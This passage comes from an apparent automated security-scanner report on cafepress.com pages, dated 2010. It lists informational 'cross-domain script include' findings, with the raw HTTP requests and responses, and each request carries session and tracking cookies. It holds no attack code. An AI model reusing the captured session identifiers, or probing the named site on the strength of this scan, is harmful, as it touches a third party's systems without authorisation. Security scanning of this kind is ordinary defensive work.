Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 60077
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100139; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.29. http://www.cafepress.com/+ornaments previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+ornaments

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 58964
Date: Sun, 26 Dec 2010 13:48:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:41 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content2.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.30. http://www.cafepress.com/+posters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+posters

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

5.31. http://www.cafepress.com/+stadium-blanket previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stadium-blanket

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59409
Date: Sun, 26 Dec 2010 13:48:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.32. http://www.cafepress.com/+steins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+steins

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content9.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+steins HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 58661
Date: Sun, 26 Dec 2010 13:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content9.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.33. http://www.cafepress.com/+stocking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+stocking

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+stocking HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59563
Date: Sun, 26 Dec 2010 13:48:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
</div>

<script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

5.34. http://www.cafepress.com/+sweatshirts-hoodies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+sweatshirts-hoodies

Issue detail

The response dynamically includes the following scripts from other domains:

http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /+sweatshirts-hoodies HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; 